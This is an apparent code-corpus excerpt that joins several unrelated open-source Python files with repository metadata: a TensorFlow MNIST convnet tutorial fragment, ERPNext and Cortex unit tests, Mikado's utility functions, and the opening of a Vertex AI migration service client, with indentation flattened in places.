fc = tf.nn.dropout(fc, dropout, name='relu_dropout')
with tf.variable_scope('softmax_linear') as scope:
w = tf.get_variable('weights', [1024, N_CLASSES],
initializer=tf.truncated_normal_initializer())
b = tf.get_variable('biases', [N_CLASSES],
initializer=tf.random_normal_initializer())
logits = tf.matmul(fc, w) + b
# Step 6: define loss function
# use softmax cross entropy with logits as the loss function
# compute mean cross entropy, softmax is applied internally
with tf.name_scope('loss'):
    entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y)
loss = tf.reduce_mean(entropy, name='loss')
# Step 7: define training op
# using gradient descent with learning rate of LEARNING_RATE to minimize cost
optimizer = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss,
global_step=global_step)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver()
# to visualize using TensorBoard
writer = tf.summary.FileWriter('./my_graph/mnist', sess.graph)
ckpt = tf.train.get_checkpoint_state(os.path.dirname('checkpoints/convnet_mnist_new/checkpoint'))
# if that checkpoint exists, restore from checkpoint
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
initial_step = global_step.eval()
start_time = time.time()
n_batches = int(mnist.train.num_examples / BATCH_SIZE)
total_loss = 0.0
for index in range(initial_step, n_batches * N_EPOCHS): # train the model n_epochs times
X_batch, Y_batch = mnist.train.next_batch(BATCH_SIZE)
_, loss_batch = sess.run([optimizer, loss],
feed_dict={X: X_batch, Y:Y_batch, dropout: DROPOUT})
total_loss += loss_batch
if (index + 1) % SKIP_STEP == 0:
print('Average loss at step {}: {:5.1f}'.format(index + 1, total_loss / SKIP_STEP))
total_loss = 0.0
saver.save(sess, 'checkpoints/convnet_mnist_new/mnist-convnet', index)
print("Optimization Finished!") # should be around 0.35 after 25 epochs
print("Total time: {0} seconds".format(time.time() - start_time))
# test the model
n_batches = int(mnist.test.num_examples/BATCH_SIZE)
total_correct_preds = 0
for i in range(n_batches):
X_batch, Y_batch = mnist.test.next_batch(BATCH_SIZE)
        # evaluation only: no optimizer step on the test set, and keep all units (dropout=1.0)
        loss_batch, logits_batch = sess.run([loss, logits],
                                            feed_dict={X: X_batch, Y: Y_batch, dropout: 1.0})
preds = tf.nn.softmax(logits_batch)
correct_preds = tf.equal(tf.argmax(preds, 1), tf.argmax(Y_batch, 1))
accuracy = tf.reduce_sum(tf.cast(correct_preds, tf.float32))
total_correct_preds += sess.run(accuracy)
print("Accuracy {0}".format(total_correct_preds/mnist.test.num_examples))
|
adukic/nd101
|
tf-stanford-tutorials/examples/07_convnet_mnist.py
|
Python
|
mit
| 6,514
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
import unittest
from erpnext.shopping_cart.doctype.shopping_cart_settings.shopping_cart_settings import ShoppingCartSetupError
class TestShoppingCartSettings(unittest.TestCase):
def setUp(self):
frappe.db.sql("""delete from `tabSingles` where doctype="Shipping Cart Settings" """)
frappe.db.sql("""delete from `tabShopping Cart Price List`""")
frappe.db.sql("""delete from `tabShopping Cart Taxes and Charges Master`""")
frappe.db.sql("""delete from `tabShopping Cart Shipping Rule`""")
def get_cart_settings(self):
return frappe.get_doc({"doctype": "Shopping Cart Settings",
"company": "_Test Company"})
def test_price_list_territory_overlap(self):
cart_settings = self.get_cart_settings()
def _add_price_list(price_list):
cart_settings.append("price_lists", {
"doctype": "Shopping Cart Price List",
"selling_price_list": price_list
})
for price_list in ("_Test Price List Rest of the World", "_Test Price List India",
"_Test Price List"):
_add_price_list(price_list)
controller = cart_settings
controller.validate_overlapping_territories("price_lists", "selling_price_list")
_add_price_list("_Test Price List 2")
controller = cart_settings
self.assertRaises(ShoppingCartSetupError, controller.validate_overlapping_territories,
"price_lists", "selling_price_list")
return cart_settings
def test_taxes_territory_overlap(self):
cart_settings = self.get_cart_settings()
def _add_tax_master(tax_master):
cart_settings.append("sales_taxes_and_charges_masters", {
"doctype": "Shopping Cart Taxes and Charges Master",
"sales_taxes_and_charges_master": tax_master
})
for tax_master in ("_Test Sales Taxes and Charges Template", "_Test India Tax Master"):
_add_tax_master(tax_master)
controller = cart_settings
controller.validate_overlapping_territories("sales_taxes_and_charges_masters",
"sales_taxes_and_charges_master")
_add_tax_master("_Test Sales Taxes and Charges Template - Rest of the World")
controller = cart_settings
self.assertRaises(ShoppingCartSetupError, controller.validate_overlapping_territories,
"sales_taxes_and_charges_masters", "sales_taxes_and_charges_master")
def test_exchange_rate_exists(self):
frappe.db.sql("""delete from `tabCurrency Exchange`""")
cart_settings = self.test_price_list_territory_overlap()
controller = cart_settings
self.assertRaises(ShoppingCartSetupError, controller.validate_exchange_rates_exist)
from erpnext.setup.doctype.currency_exchange.test_currency_exchange import test_records as \
currency_exchange_records
frappe.get_doc(currency_exchange_records[0]).insert()
controller.validate_exchange_rates_exist()
|
ThiagoGarciaAlves/erpnext
|
erpnext/shopping_cart/doctype/shopping_cart_settings/test_shopping_cart_settings.py
|
Python
|
agpl-3.0
| 2,960
|
##########################################################################
#
# Copyright (c) 2010, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import math
import unittest
import random
import imath
import IECore
import IECoreScene
class AddAndRemoveSmoothSkinningInfluencesOpTest( unittest.TestCase ) :
def createSSD( self, names, poses, indices ) :
offsets = IECore.IntVectorData( [0, 2, 5, 6, 8] )
counts = IECore.IntVectorData( [2, 3, 1, 2, 3] )
weights = IECore.FloatVectorData( [0.7, 0.7, 0.2, 0.6, 0.0, 0.1, 1.2, 0.8, 0.4, 0.6, 0.4] )
ssd = IECoreScene.SmoothSkinningData( names, poses, offsets, counts, indices, weights )
return ssd
def original( self ) :
names = IECore.StringVectorData( [ 'jointA', 'jointB', 'jointC' ] )
poses = IECore.M44fVectorData( [imath.M44f(1),imath.M44f(2),imath.M44f(3)] )
indices = IECore.IntVectorData( [0, 1, 0, 1, 2, 1, 1, 2, 0, 1, 2] )
return self.createSSD( names, poses, indices )
def added( self ) :
names = IECore.StringVectorData( [ 'newA', 'jointA', 'newC', 'newB', 'jointB', 'jointC', 'newD' ] )
poses = IECore.M44fVectorData( [ imath.M44f(4), imath.M44f(1), imath.M44f(6), imath.M44f(5), imath.M44f(2), imath.M44f(3), imath.M44f(7) ] )
indices = IECore.IntVectorData( [1, 4, 1, 4, 5, 4, 4, 5, 1, 4, 5] )
return self.createSSD( names, poses, indices )
def removed( self ) :
names = IECore.StringVectorData( [ 'jointA', 'newC', 'newB', 'jointC' ] )
poses = IECore.M44fVectorData( [ imath.M44f(1), imath.M44f(6), imath.M44f(5), imath.M44f(3) ] )
offsets = IECore.IntVectorData( [0, 1, 3, 3, 4] )
counts = IECore.IntVectorData( [1, 2, 0, 1, 2] )
indices = IECore.IntVectorData( [0, 0, 3, 3, 0, 3] )
weights = IECore.FloatVectorData( [0.7, 0.2, 0.0, 0.8, 0.4, 0.4] )
ssd = IECoreScene.SmoothSkinningData( names, poses, offsets, counts, indices, weights )
return ssd
def testTypes( self ) :
""" Test AddSmoothSkinningInfluencesOp and RemoveSmoothSkinningInfluencesOp types"""
ssd = self.original()
op = IECoreScene.AddSmoothSkinningInfluencesOp()
self.assertEqual( type(op), IECoreScene.AddSmoothSkinningInfluencesOp )
self.assertEqual( op.typeId(), IECoreScene.TypeId.AddSmoothSkinningInfluencesOp )
op.parameters()['input'].setValue( IECore.IntData(1) )
self.assertRaises( RuntimeError, op.operate )
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
self.assertEqual( type(op), IECoreScene.RemoveSmoothSkinningInfluencesOp )
self.assertEqual( op.typeId(), IECoreScene.TypeId.RemoveSmoothSkinningInfluencesOp )
op.parameters()['input'].setValue( IECore.IntData(1) )
self.assertRaises( RuntimeError, op.operate )
def testAddingNothing( self ) :
""" Test AddSmoothSkinningInfluencesOp with no new influences"""
ssd = self.original()
op = IECoreScene.AddSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
result = op.operate()
self.assertEqual( result.influenceNames(), ssd.influenceNames() )
self.assertEqual( result.influencePose(), ssd.influencePose() )
self.assertEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertEqual( result, ssd )
def testAdding( self ) :
""" Test AddSmoothSkinningInfluencesOp"""
ssd = self.original()
op = IECoreScene.AddSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "newA", "newB", "newC", "newD" ] ) )
op.parameters()['influencePose'].setValue( IECore.M44fVectorData( [ imath.M44f(4), imath.M44f(5), imath.M44f(6), imath.M44f(7) ] ) )
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 0, 2, 2, 6 ] ) )
result = op.operate()
self.assertNotEqual( result.influenceNames(), ssd.influenceNames() )
self.assertNotEqual( result.influencePose(), ssd.influencePose() )
self.assertNotEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertNotEqual( result, ssd )
added = self.added()
self.assertEqual( result.influenceNames(), added.influenceNames() )
self.assertEqual( result.influencePose(), added.influencePose() )
self.assertEqual( result.pointIndexOffsets(), added.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), added.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceIndices(), added.pointInfluenceIndices() )
self.assertEqual( result.pointInfluenceWeights(), added.pointInfluenceWeights() )
self.assertEqual( result, added )
def testRemovingNothing( self ) :
""" Test RemoveSmoothSkinningInfluencesOp with no new influences"""
ssd = self.original()
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
result = op.operate()
self.assertEqual( result.influenceNames(), ssd.influenceNames() )
self.assertEqual( result.influencePose(), ssd.influencePose() )
self.assertEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertEqual( result, ssd )
def testRemovingNamedMode( self ) :
""" Test RemoveSmoothSkinningInfluencesOp in named mode"""
ssd = self.added()
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['mode'].setValue( IECoreScene.RemoveSmoothSkinningInfluencesOp.Mode.Named )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "newA", "jointB", "newD" ] ) )
result = op.operate()
self.assertNotEqual( result.influenceNames(), ssd.influenceNames() )
self.assertNotEqual( result.influencePose(), ssd.influencePose() )
self.assertNotEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertNotEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertNotEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertNotEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertNotEqual( result, ssd )
removed = self.removed()
self.assertEqual( result.influenceNames(), removed.influenceNames() )
self.assertEqual( result.influencePose(), removed.influencePose() )
self.assertEqual( result.pointIndexOffsets(), removed.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), removed.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceIndices(), removed.pointInfluenceIndices() )
self.assertEqual( result.pointInfluenceWeights(), removed.pointInfluenceWeights() )
self.assertEqual( result, removed )
def testRemovingIndexedMode( self ) :
""" Test RemoveSmoothSkinningInfluencesOp in index mode"""
ssd = self.added()
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['mode'].setValue( IECoreScene.RemoveSmoothSkinningInfluencesOp.Mode.Indexed )
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 0, 4, 6 ] ) )
result = op.operate()
self.assertNotEqual( result.influenceNames(), ssd.influenceNames() )
self.assertNotEqual( result.influencePose(), ssd.influencePose() )
self.assertNotEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertNotEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertNotEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertNotEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertNotEqual( result, ssd )
removed = self.removed()
self.assertEqual( result.influenceNames(), removed.influenceNames() )
self.assertEqual( result.influencePose(), removed.influencePose() )
self.assertEqual( result.pointIndexOffsets(), removed.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), removed.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceIndices(), removed.pointInfluenceIndices() )
self.assertEqual( result.pointInfluenceWeights(), removed.pointInfluenceWeights() )
self.assertEqual( result, removed )
def testRemovingWeightlessMode( self ) :
""" Test RemoveSmoothSkinningInfluencesOp in weightless mode"""
ssd = self.added()
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['mode'].setValue( IECoreScene.RemoveSmoothSkinningInfluencesOp.Mode.Weightless )
result = op.operate()
self.assertNotEqual( result.influenceNames(), ssd.influenceNames() )
self.assertNotEqual( result.influencePose(), ssd.influencePose() )
self.assertNotEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertNotEqual( result, ssd )
removed = self.original()
self.assertEqual( result.influenceNames(), removed.influenceNames() )
self.assertEqual( result.influencePose(), removed.influencePose() )
self.assertEqual( result.pointIndexOffsets(), removed.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), removed.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceIndices(), removed.pointInfluenceIndices() )
self.assertEqual( result.pointInfluenceWeights(), removed.pointInfluenceWeights() )
self.assertEqual( result, removed )
def testAddOpErrorStates( self ) :
""" Test AddSmoothSkinningInfluencesOp with various error states"""
ssd = self.original()
op = IECoreScene.AddSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "newA", "newB", "newC" ] ) )
op.parameters()['influencePose'].setValue( IECore.M44fVectorData( [ imath.M44f(1), imath.M44f(2) ] ) )
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 1, 3 ] ) )
# wrong number of pose matrices
self.assertRaises( RuntimeError, op.operate )
# wrong number of indices
op.parameters()['influencePose'].setValue( IECore.M44fVectorData( [ imath.M44f(1), imath.M44f(2), imath.M44f(3) ] ) )
self.assertRaises( RuntimeError, op.operate )
# index validity
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 1, 3, 6 ] ) )
self.assertRaises( RuntimeError, op.operate )
# existing influenceName
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 1, 2, 3 ] ) )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "jointA", "newB", "newC" ] ) )
self.assertRaises( RuntimeError, op.operate )
def testRemoveOpErrorStates( self ) :
""" Test RemoveSmoothSkinningInfluencesOp with various error states"""
ssd = self.original()
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "newA", "newB", "newC" ] ) )
# index validity
op.parameters()['mode'].setValue( IECoreScene.RemoveSmoothSkinningInfluencesOp.Mode.Indexed )
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 1, 3 ] ) )
self.assertRaises( RuntimeError, op.operate )
# name validity
op.parameters()['mode'].setValue( IECoreScene.RemoveSmoothSkinningInfluencesOp.Mode.Named )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "jointFAKE", "newB", "newC" ] ) )
self.assertRaises( RuntimeError, op.operate )
if __name__ == "__main__":
unittest.main()
|
appleseedhq/cortex
|
test/IECoreScene/AddAndRemoveSmoothSkinningInfluencesOpTest.py
|
Python
|
bsd-3-clause
| 13,756
|
"""
This module contains basic utilities for the suite, like e.g. database connection
and log creation.
"""
import os
import functools
import re
from typing import Tuple, Union
from . import dbutils
from . import log_utils
import collections
import gzip
from itertools import zip_longest
from .overlap import overlap
from . import intervaltree
from .f1 import calc_f1
from .intervaltree import Interval, IntervalTree, IntervalNode, distance
import sys
__author__ = 'Luca Venturini'
# Diamond default: qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue bitscore
# BLASTX default: qaccver saccver pident length mismatch gapopen qstart qend sstart send evalue bitscore
from ..exceptions import InvalidConfiguration
blast_keys = "qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue bitscore ppos btop".split()
def comma_split(string):
"""Small utility to split a string based on comma. Useful for parsers."""
return string.split(",")
def path_join(output_dir, output_file):
"""Small utility to join together a directory path and
an output file, checking first that the output file is not
an absolute path.
:param output_dir: the output directory
:param output_file: the output file
"""
if os.path.isabs(output_file):
return output_file
else:
return os.path.join(output_dir,
output_file)
def memoize(obj):
"""
    Function to memoize the results of functions/properties in memory for fast access.
Source: https://wiki.python.org/moin/PythonDecoratorLibrary#Memoize
:param obj: the object/function to memoize
:return:
"""
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
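# Illustrative sketch, not part of the original module: `memoize` keys its cache on the
# stringified positional and keyword arguments, so repeated calls with identical inputs
# return the cached value instead of recomputing it. `_memoize_example` is a hypothetical
# demo helper; it is defined here but never called at import time.
@memoize
def _memoize_example(value):
    # the body only runs on the first call for each distinct `value`
    return value * value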
def merge_partial(filenames, handle, logger=None, gzipped=False):
"""This function merges the partial files created by the multiprocessing into a single
sorted file.
:param filenames: the filenames to merge into the handle
:type filenames: list[str]
:param handle: the handle to use for printing
:type handle: io.TextIOWrapper
:param logger: logger to be used for the merging
"""
if logger is None:
logger = log_utils.create_null_logger("merger")
if len(filenames) == 0:
logger.warning("Nothing to merge. Exiting")
logger.debug("Starting to merge %d files (root: %s)",
len(filenames), "-".join(filenames[0].split("-")[:-1]))
current_lines = collections.defaultdict(list)
try:
if gzipped is False:
fnames = [open(_) for _ in filenames if os.stat(_).st_size > 0]
else:
fnames = [gzip.open(_, "rt") for _ in filenames if os.stat(_).st_size > 0]
except FileNotFoundError as exc:
raise FileNotFoundError((filenames, os.listdir(os.path.dirname(filenames[0]))))
if len(fnames) == 0:
logger.warning("All the files to merge (root %s) are empty. Exiting.",
"-".join(filenames[0].split("-")[:-1]))
[_.close() for _ in fnames]
return 0
for lines in zip_longest(*fnames):
for line in iter(_ for _ in lines if _ is not None):
_ = line.split("/")
index = int(_[0])
current_lines[index].append("/".join(_[1:]))
if len(current_lines) == 0:
logger.exception("Nothing found to merge for root %s. ERROR!.",
"-".join(filenames[0].split("-")[:-1]))
[_.close() for _ in fnames]
[os.remove(_) for _ in filenames]
raise IndexError
total = max(current_lines.keys())
logger.debug("Merging %d lines into %s", total, handle.name)
[_.close() for _ in fnames]
[os.remove(_) for _ in filenames]
for index in sorted(current_lines.keys()):
for line in current_lines[index]:
print(line, file=handle, end="")
del current_lines[index]
logger.debug("Merged %d lines into %s", total, handle.name)
handle.flush()
return total
def grouper(iterable, n):
"""
Function to chunk an iterable into slices of at most n elements.
:param iterable:
:param n:
:return:
"""
temp = []
for val in iterable:
temp.append(val)
if len(temp) >= n:
yield temp
temp = []
if temp:
yield temp
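# Illustrative sketch, not part of the original module: `grouper` yields lists of at most
# n items, with the final, possibly shorter, chunk yielded as well. Defined but not called
# at import time.
def _grouper_example():
    chunks = list(grouper(range(7), 3))
    # chunks == [[0, 1, 2], [3, 4, 5], [6]]
    return chunks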
def merge_dictionaries(dict_a, dict_b, path=None):
"""Recursive function to merge two dictionaries.
:param dict_a: first dictionary
:type dict_a: dict
:param dict_b: second dictionary
:type dict_b: dict
:param path: list to be updated during recursion to indicate
that we are in a secondary node
:type path: list(str)
Source: http://stackoverflow.com/questions/7204805/dictionaries-of-dictionaries-merge
"""
if path is None:
path = []
for key in dict_b:
if key in dict_a and isinstance(dict_a[key], dict) and isinstance(dict_b[key], dict):
merge_dictionaries(
dict_a[key],
dict_b[key], path + [str(key)])
else:
dict_a[key] = dict_b[key]
return dict_a
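# Illustrative sketch, not part of the original module: nested dictionaries are merged
# recursively, while scalar values from the second dictionary overwrite those in the
# first (note that dict_a is modified in place). Defined but not called at import time.
def _merge_dictionaries_example():
    merged = merge_dictionaries({"db": {"host": "localhost", "port": 3306}},
                                {"db": {"port": 5432}, "debug": True})
    # merged == {"db": {"host": "localhost", "port": 5432}, "debug": True}
    return merged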
def merge_ranges(ranges):
"""
Merge overlapping and adjacent ranges and yield the merged ranges
in order. The argument must be an iterable of pairs (start, stop).
>>> list(merge_ranges([(5,7), (3,5), (-1,3)]))
[(-1, 7)]
>>> list(merge_ranges([(5,6), (3,4), (1,2)]))
[(1, 2), (3, 4), (5, 6)]
>>> list(merge_ranges([]))
[]
"""
ranges = iter(sorted(ranges))
try:
current_start, current_stop = next(ranges)
except StopIteration:
return
for start, stop in ranges:
if start > current_stop:
# Gap between segments: output current segment and start a new one.
yield current_start, current_stop
current_start, current_stop = start, stop
else:
# Segments adjacent or overlapping: merge.
current_stop = max(current_stop, stop)
yield current_start, current_stop
_reg_pat = re.compile(r"^([^:]*):(\d*)(?:-|\.\.)(\d*)$")
def to_region(string: Union[str, bytes]) -> Tuple[str, int, int]:
"""
Snippet to convert from Apollo-style region to a tuple of chrom, start, end
:param string:
:return:
"""
if not isinstance(string, (str, bytes)):
raise ValueError("Invalid region: {} (type {})".format(string, type(string)))
elif isinstance(string, bytes):
string = string.decode()
string = string.strip()
try:
chrom, start, end = _reg_pat.search(string).groups()
start, end = int(start), int(end)
except (ValueError, AttributeError, TypeError):
raise ValueError("Invalid string specified: {}".format(string))
if end < start:
raise ValueError("Start greater than end: {0}\t{1}".format(start, end))
return chrom, start, end
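# Illustrative sketch, not part of the original module: both "chrom:start-end" and
# "chrom:start..end" region strings are accepted, byte strings are decoded first, and an
# end smaller than the start raises a ValueError. Defined but not called at import time.
def _to_region_example():
    assert to_region("Chr5:1000-2000") == ("Chr5", 1000, 2000)
    assert to_region(b"Chr5:1000..2000") == ("Chr5", 1000, 2000)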
def percentage(value):
value = float(value)
if value < 0:
raise ValueError("Negative numbers are not allowed")
elif value > 100:
raise ValueError("Only numbers between 0 and 100 are allowed")
while 1 < value <= 100:
value /= 100
return value
def default_for_serialisation(obj):
if isinstance(obj, set):
return tuple(obj)
elif obj == float("inf"):
return sys.maxsize
def to_bool(param: Union[str, bool, int, float]):
"""Function to convert a items to booleans."""
if isinstance(param, bool):
return param
elif isinstance(param, (int, float)):
if param == 1:
return True
elif param == 0:
return False
elif isinstance(param, (str, bytes)):
if isinstance(param, bytes):
param = param.decode()
lparam = param.lower()
if lparam == 'true' or lparam == "1":
return True
elif lparam == 'false' or lparam == "0":
return False
raise ValueError(f"Invalid boolean parameter: {param}")
|
lucventurini/mikado
|
Mikado/utilities/__init__.py
|
Python
|
lgpl-3.0
| 8,160
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.api_core import operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.aiplatform_v1beta1.services.migration_service import pagers
from google.cloud.aiplatform_v1beta1.types import migratable_resource
from google.cloud.aiplatform_v1beta1.types import migration_service
from .transports.base import MigrationServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import MigrationServiceGrpcTransport
from .transports.grpc_asyncio import MigrationServiceGrpcAsyncIOTransport
class MigrationServiceClientMeta(type):
"""Metaclass for the MigrationService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[MigrationServiceTransport]]
_transport_registry["grpc"] = MigrationServiceGrpcTransport
_transport_registry["grpc_asyncio"] = MigrationServiceGrpcAsyncIOTransport
def get_transport_class(cls, label: str = None,) -> Type[MigrationServiceTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class MigrationServiceClient(metaclass=MigrationServiceClientMeta):
"""A service that migrates resources from automl.googleapis.com,
datalabeling.googleapis.com and ml.googleapis.com to Vertex AI.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "aiplatform.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
MigrationServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
MigrationServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> MigrationServiceTransport:
"""Returns the transport used by the client instance.
Returns:
MigrationServiceTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def annotated_dataset_path(
project: str, dataset: str, annotated_dataset: str,
) -> str:
"""Returns a fully-qualified annotated_dataset string."""
return "projects/{project}/datasets/{dataset}/annotatedDatasets/{annotated_dataset}".format(
